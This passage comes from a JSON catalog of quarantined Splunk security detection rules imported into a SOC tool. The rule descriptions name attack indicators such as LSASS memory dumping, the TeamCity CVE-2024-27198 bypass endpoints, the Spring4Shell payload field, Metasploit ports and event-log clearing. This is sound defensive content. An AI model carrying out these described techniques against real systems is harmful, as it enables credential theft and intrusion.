[ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-ds-user-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fabd364e-04f3-11ec-b34b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_ds_user_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-faefb681-14be-4f0d-9cac-0bc0160c7280", "type": "detection", "name": "Windows Multiple Account Passwords Changed", "description": "The following analytic detects instances where more than five unique Windows account passwords are changed within a 10-minute interval. It leverages Event Code 4724 from the Windows Security Event Log, using the wineventlog_security dataset to monitor and count distinct TargetUserName values. This behavior is significant as rapid password changes across multiple accounts are unusual and may indicate unauthorized access or internal compromise. If confirmed malicious, this activity could lead to widespread account compromise, unauthorized access to sensitive information, and potential disruption of services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-account-passwords-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "faefb681-14be-4f0d-9cac-0bc0160c7280", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_account_passwords_changed.yml" } }, { "id": "splunk-security-content-fb3b2bb3-75a4-4279-848a-165b42624770", "type": "detection", "name": "Windows Computer Account Requesting Kerberos Ticket", "description": "The following analytic detects a computer account requesting a Kerberos ticket, which is unusual as typically user accounts request these tickets. This detection leverages Windows Security Event Logs, specifically EventCode 4768, to identify instances where the TargetUserName ends with a dollar sign ($), indicating a computer account. This activity is significant because it may indicate the use of tools like KrbUpRelay or other Kerberos-based attacks. If confirmed malicious, this could allow attackers to impersonate computer accounts, potentially leading to unauthorized access and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-computer-account-requesting-kerberos-ticket.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fb3b2bb3-75a4-4279-848a-165b42624770", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_computer_account_requesting_kerberos_ticket.yml" } }, { "id": "splunk-security-content-fb4c31b0-13e8-4155-8aa5-24de4b8d6717", "type": "detection", "name": "Access LSASS Memory for Dump Creation", "description": "The following analytic detects attempts to dump the LSASS process memory, a common technique in credential dumping attacks. It leverages Sysmon logs, specifically EventCode 10, to identify suspicious call traces to dbgcore.dll and dbghelp.dll associated with lsass.exe. This activity is significant as it often precedes the theft of sensitive login credentials, posing a high risk of unauthorized access to systems and data. If confirmed malicious, attackers could gain access to critical credentials, enabling further compromise and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/access-lsass-memory-for-dump-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fb4c31b0-13e8-4155-8aa5-24de4b8d6717", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/access_lsass_memory_for_dump_creation.yml" } }, { "id": "splunk-security-content-fbcc04c7-8a79-453c-b3a9-c232c423bdd3", "type": "detection", "name": "JetBrains TeamCity Authentication Bypass Suricata CVE-2024-27198", "description": "The following analytic detects attempts to exploit the CVE-2024-27198 vulnerability in JetBrains TeamCity on-premises servers, which allows attackers to bypass authentication mechanisms. It leverages Suricata HTTP traffic logs to identify suspicious POST requests to the `/app/rest/users` and `/app/rest/users/id:1/tokens` endpoints. This activity is significant because it can lead to unauthorized administrative access, enabling attackers to gain full control over the TeamCity server, including projects, builds, agents, and artifacts. If confirmed malicious, this could result in severe security breaches and compromise the integrity of the development environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/jetbrains-teamcity-authentication-bypass-suricata-cve-2024-27198.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fbcc04c7-8a79-453c-b3a9-c232c423bdd3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/jetbrains_teamcity_authentication_bypass_suricata_cve_2024_27198.yml" } }, { "id": "splunk-security-content-fbcc04c7-8a79-453c-b3a9-c232c423bdd4", "type": "detection", "name": "JetBrains TeamCity Authentication Bypass CVE-2024-27198", "description": "The following analytic identifies attempts to exploit the JetBrains TeamCity Authentication Bypass vulnerability (CVE-2024-27198). It detects suspicious POST requests to the `/app/rest/users` and `/app/rest/users/id:1/tokens` endpoints, which are indicative of attempts to create new administrator users or generate admin access tokens without authentication. This detection leverages the Web datamodel and CIM-compliant log sources, such as Nginx or TeamCity logs. This activity is significant as it can lead to full control over the TeamCity server, including all projects, builds, agents, and artifacts. If confirmed malicious, attackers could gain unauthorized administrative access, leading to severe security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/jetbrains-teamcity-authentication-bypass-cve-2024-27198.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fbcc04c7-8a79-453c-b3a9-c232c423bdd4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/jetbrains_teamcity_authentication_bypass_cve_2024_27198.yml" } }, { "id": "splunk-security-content-fbd4f333-17bb-4eab-89cb-860fa2e0600e", "type": "detection", "name": "Windows Modify Registry No Auto Update", "description": "The following analytic identifies a suspicious modification to the Windows registry that disables automatic updates. It detects changes to the registry path `SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU\\NoAutoUpdate` with a value of `0x00000001`. This activity is significant as it is commonly used by adversaries, including malware like RedLine Stealer, to evade detection and maintain persistence. If confirmed malicious, this could allow attackers to bypass security updates, leaving the system vulnerable to further exploitation and potential zero-day attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-no-auto-update.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fbd4f333-17bb-4eab-89cb-860fa2e0600e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_no_auto_update.yml" } }, { "id": "splunk-security-content-fbf9e47f-e531-4fea-942d-5c95af7ed4d6", "type": "detection", "name": "Windows PowerView Unconstrained Delegation Discovery", "description": "The following analytic detects the use of PowerView commandlets to discover Windows endpoints with Kerberos Unconstrained Delegation. It leverages PowerShell Script Block Logging (EventCode=4104) to identify specific commands like `Get-DomainComputer` or `Get-NetComputer` with the `-Unconstrained` parameter. This activity is significant as it indicates potential reconnaissance efforts by adversaries or Red Teams to map out privileged delegation settings in Active Directory. If confirmed malicious, this could allow attackers to identify high-value targets for further exploitation, potentially leading to privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powerview-unconstrained-delegation-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fbf9e47f-e531-4fea-942d-5c95af7ed4d6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powerview_unconstrained_delegation_discovery.yml" } }, { "id": "splunk-security-content-fbfef407-cfee-4866-88c1-f8de1c16147c", "type": "detection", "name": "Windows Impair Defense Disable PUA Protection", "description": "The following analytic detects a modification in the Windows registry to disable Windows Defender PUA protection by setting PUAProtection to 0. This detection leverages data from the Endpoint.Registry datamodel, focusing on registry path changes related to Windows Defender. Disabling PUA protection is significant as it reduces defenses against Potentially Unwanted Applications (PUAs), which, while not always malicious, can negatively impact user experience and security. If confirmed malicious, this activity could allow an attacker to introduce adware, browser toolbars, or other unwanted software, potentially compromising system integrity and user productivity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-pua-protection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fbfef407-cfee-4866-88c1-f8de1c16147c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_pua_protection.yml" } }, { "id": "splunk-security-content-fc2a024a-18c1-4d31-9480-7f04cf3ff293", "type": "detection", "name": "MCP Filesystem Server Suspicious Extension Write", "description": "This detection identifies attempts to create executable or script files through MCP filesystem server connections. Threat actors leveraging LLM-based tools may attempt to write malicious executables, scripts, or batch files to disk for persistence or code execution. The detection prioritizes files written to system directories or startup locations which indicate higher likelihood of malicious intent.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mcp-filesystem-server-suspicious-extension-write.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fc2a024a-18c1-4d31-9480-7f04cf3ff293", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/mcp_filesystem_server_suspicious_extension_write.yml" } }, { "id": "splunk-security-content-fc32a8d5-bc79-4437-b48f-4646ab7bed9d", "type": "detection", "name": "Cisco NVM - Outbound Connection to Suspicious Port", "description": "The following analytic detects any outbound network connection from an endpoint process to a known suspicious or non-standard port.\nIt leverages Cisco Network Visibility Module flow data logs to identify potentially suspicious behavior by looking at processes\ncommunicating over ports like 4444, 2222, or 51820 are commonly used by tools like Metasploit, SliverC2 or other pentest, red team or malware.\nThese connections are worth investigating further, especially when initiated by unexpected or non-network-native binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-outbound-connection-to-suspicious-port.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fc32a8d5-bc79-4437-b48f-4646ab7bed9d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___outbound_connection_to_suspicious_port.yml" } }, { "id": "splunk-security-content-fc3ccef1-60a4-4239-bd66-b279511b4d14", "type": "detection", "name": "Windows AD Domain Controller Audit Policy Disabled", "description": "The following analytic detects the disabling of audit policies on a domain controller. It leverages EventCode 4719 from Windows Security Event Logs to identify changes where success or failure auditing is removed. This activity is significant as it suggests an attacker may have gained access to the domain controller and is attempting to evade detection by tampering with audit policies. If confirmed malicious, this could lead to severe consequences, including data theft, privilege escalation, and full network compromise. Immediate investigation is required to determine the source and intent of the change.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-domain-controller-audit-policy-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fc3ccef1-60a4-4239-bd66-b279511b4d14", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_domain_controller_audit_policy_disabled.yml" } }, { "id": "splunk-security-content-fc5531ae-62fd-4de6-9c36-b4afdae8ca95", "type": "detection", "name": "Kubernetes Nginx Ingress RFI", "description": "The following analytic detects remote file inclusion (RFI) attacks targeting Kubernetes Nginx ingress controllers. It leverages Kubernetes logs from the Nginx ingress controller, parsing fields such as `remote_addr`, `request`, and `url` to identify suspicious activity. This activity is significant because RFI attacks can allow attackers to execute arbitrary code or access sensitive files on the server. If confirmed malicious, this could lead to unauthorized access, data exfiltration, or further compromise of the Kubernetes environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1212" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-nginx-ingress-rfi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fc5531ae-62fd-4de6-9c36-b4afdae8ca95", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_nginx_ingress_rfi.yml" } }, { "id": "splunk-security-content-fca01769-5163-4b3a-ae44-de874adfc9bc", "type": "detection", "name": "Windows Phishing Outlook Drop Dll In FORM Dir", "description": "The following analytic detects the creation of a DLL file by an outlook.exe process in the AppData\\Local\\Microsoft\\FORMS directory. This detection leverages data from the Endpoint.Processes and Endpoint.Filesystem datamodels, focusing on process and file creation events. This activity is significant as it may indicate an attempt to exploit CVE-2024-21378, where a custom MAPI form loads a potentially malicious DLL. If confirmed malicious, this could allow an attacker to execute arbitrary code, leading to further system compromise or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-phishing-outlook-drop-dll-in-form-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fca01769-5163-4b3a-ae44-de874adfc9bc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_phishing_outlook_drop_dll_in_form_dir.yml" } }, { "id": "splunk-security-content-fcd6dfeb-191c-46a0-a29c-c306382145ab", "type": "detection", "name": "Azure AD PIM Role Assigned", "description": "The following analytic detects the assignment of an Azure AD Privileged Identity Management (PIM) role. It leverages Azure Active Directory events to identify when a user is added as an eligible member to a PIM role. This activity is significant because PIM roles grant elevated privileges, and their assignment should be closely monitored to prevent unauthorized access. If confirmed malicious, an attacker could exploit this to gain privileged access, potentially leading to unauthorized actions, data breaches, or further compromise of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-pim-role-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fcd6dfeb-191c-46a0-a29c-c306382145ab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_pim_role_assigned.yml" } }, { "id": "splunk-security-content-fcd74532-ae54-11eb-a5ab-acde48001122", "type": "detection", "name": "Enumerate Users Local Group Using Telegram", "description": "The following analytic detects a Telegram process enumerating all network users in a local group. It leverages EventCode 4798, which is generated when a process enumerates a user's security-enabled local groups on a computer or device. This activity is significant as it may indicate an attempt to gather information on user accounts, a common precursor to further malicious actions. If confirmed malicious, this behavior could allow an attacker to map out user accounts, potentially leading to privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/enumerate-users-local-group-using-telegram.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fcd74532-ae54-11eb-a5ab-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/enumerate_users_local_group_using_telegram.yml" } }, { "id": "splunk-security-content-fcdfd69d-0ca3-4476-920e-9b633cb4593e", "type": "detection", "name": "Web Spring4Shell HTTP Request Class Module", "description": "The following analytic detects HTTP requests containing payloads related to the Spring4Shell vulnerability (CVE-2022-22965). It leverages Splunk Stream HTTP data to inspect the HTTP request body and form data for specific fields such as \"class.module.classLoader.resources.context.parent.pipeline.first\". This activity is significant as it indicates an attempt to exploit a critical vulnerability in Spring Framework, potentially leading to remote code execution. If confirmed malicious, this could allow attackers to gain unauthorized access, execute arbitrary code, and compromise the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/web-spring4shell-http-request-class-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fcdfd69d-0ca3-4476-920e-9b633cb4593e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/web_spring4shell_http_request_class_module.yml" } }, { "id": "splunk-security-content-fcf4bd3f-a79f-4b7a-83bf-2692d60b859c", "type": "detection", "name": "Confluence Unauthenticated Remote Code Execution CVE-2022-26134", "description": "The following analytic detects attempts to exploit CVE-2022-26134, an unauthenticated remote code execution vulnerability in Confluence. It leverages the Web datamodel to analyze network and CIM-compliant web logs, identifying suspicious URL patterns and parameters indicative of exploitation attempts. This activity is significant as it allows attackers to execute arbitrary code on the Confluence server without authentication, potentially leading to full system compromise. If confirmed malicious, this could result in unauthorized access, data exfiltration, and further lateral movement within the network. Immediate investigation and remediation are crucial to prevent extensive damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505", "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/confluence-unauthenticated-remote-code-execution-cve-2022-26134.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fcf4bd3f-a79f-4b7a-83bf-2692d60b859c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/confluence_unauthenticated_remote_code_execution_cve_2022_26134.yml" } }, { "id": "splunk-security-content-fcf4bd3f-a79f-4b7a-83bf-2692d60b859d", "type": "detection", "name": "Microsoft SharePoint Server Elevation of Privilege", "description": "The following analytic detects potential exploitation attempts against Microsoft SharePoint Server vulnerability CVE-2023-29357.\nIt leverages the Web datamodel to monitor for specific API calls and HTTP methods indicative of privilege escalation attempts.\nThis activity is significant as it may indicate an attacker is trying to gain unauthorized privileged access to the SharePoint environment.\nIf confirmed malicious, the impact could include unauthorized access to sensitive data, potential data theft, and further compromise of the SharePoint server, leading to a broader security breach.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-sharepoint-server-elevation-of-privilege.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fcf4bd3f-a79f-4b7a-83bf-2692d60b859d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/microsoft_sharepoint_server_elevation_of_privilege.yml" } }, { "id": "splunk-security-content-fd22124e-dbac-4744-a8ce-be10d8ec3e26", "type": "detection", "name": "O365 Multiple Failed MFA Requests For User", "description": "The following analytic identifies potential \"MFA fatigue\" attacks targeting Office 365 users by detecting more than nine Multi-Factor Authentication (MFA) prompts within a 10-minute timeframe. It leverages O365 management activity logs, focusing on Azure Active Directory events with the UserLoginFailed operation, a Success ResultStatus, and an ErrorNumber of 500121. This activity is significant as attackers may exploit MFA fatigue to gain unauthorized access by overwhelming users with repeated MFA requests. If confirmed malicious, this could lead to data breaches, unauthorized data access, or further compromise within the O365 environment. Immediate investigation is crucial.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multiple-failed-mfa-requests-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fd22124e-dbac-4744-a8ce-be10d8ec3e26", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multiple_failed_mfa_requests_for_user.yml" } }, { "id": "splunk-security-content-fd496996-7d9e-4894-8d40-bb85b6192dc6", "type": "detection", "name": "Windows LOLBAS Executed As Renamed File", "description": "The following analytic identifies a LOLBAS process being executed where it's process name does not match it's original file name attribute. Processes that have been renamed and executed may be an indicator that an adversary is attempting to evade defenses or execute malicious code. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-lolbas-executed-as-renamed-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fd496996-7d9e-4894-8d40-bb85b6192dc6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_lolbas_executed_as_renamed_file.yml" } }, { "id": "splunk-security-content-fdb0f805-74e4-4539-8c00-618927333aae", "type": "detection", "name": "Spike in File Writes", "description": "The following analytic detects a sharp increase in the number of files written to a specific host. It leverages the Endpoint.Filesystem data model, focusing on 'created' actions and comparing current file write counts against historical averages and standard deviations. This activity is significant as a sudden spike in file writes can indicate malicious activities such as ransomware encryption or data exfiltration. If confirmed malicious, this behavior could lead to significant data loss, system compromise, or further propagation of malware within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/spike-in-file-writes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fdb0f805-74e4-4539-8c00-618927333aae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/spike_in_file_writes.yml" } }, { "id": "splunk-security-content-fdb59aef-d88f-4909-8369-ec2afbd2c398", "type": "detection", "name": "Windows MSIExec DLLRegisterServer", "description": "The following analytic detects the execution of msiexec.exe with the /y switch parameter, which enables the loading of DLLRegisterServer. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line arguments and parent-child process relationships. This activity is significant because it can indicate an attempt to register malicious DLLs, potentially leading to code execution or persistence on the system. If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msiexec-dllregisterserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fdb59aef-d88f-4909-8369-ec2afbd2c398", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msiexec_dllregisterserver.yml" } }, { "id": "splunk-security-content-fdb6774e-e465-4912-86e3-63cf9ab91491", "type": "detection", "name": "Windows TinyCC Shellcode Execution", "description": "Detects abuse of Tiny-C-Compiler (TinyCC) for shellcode execution, where tcc.exe is renamed to masquerade as svchost.exe and used to compile and execute C source files containing shellcode. This technique was observed in the Lotus Blossom Chrysalis backdoor campaign, where attackers renamed tcc.exe to svchost.exe and executed conf.c containing Metasploit block_api shellcode with the flags -nostdlib -run.\nTinyCC is a legitimate C compiler, but its ability to compile and execute code on-the-fly makes it attractive to attackers seeking to evade detection. The combination of a renamed compiler binary executing from non-standard locations with suspicious flags is a strong indicator of malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003", "T1027", "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-tinycc-shellcode-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fdb6774e-e465-4912-86e3-63cf9ab91491", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_tinycc_shellcode_execution.yml" } }, { "id": "splunk-security-content-fdb829a8-db84-4832-b64b-3e964cd44f01", "type": "detection", "name": "Windows Eventlog Cleared Via Wevtutil", "description": "The following analytic detects the usage of wevtutil.exe with the \"clear-log\" parameter 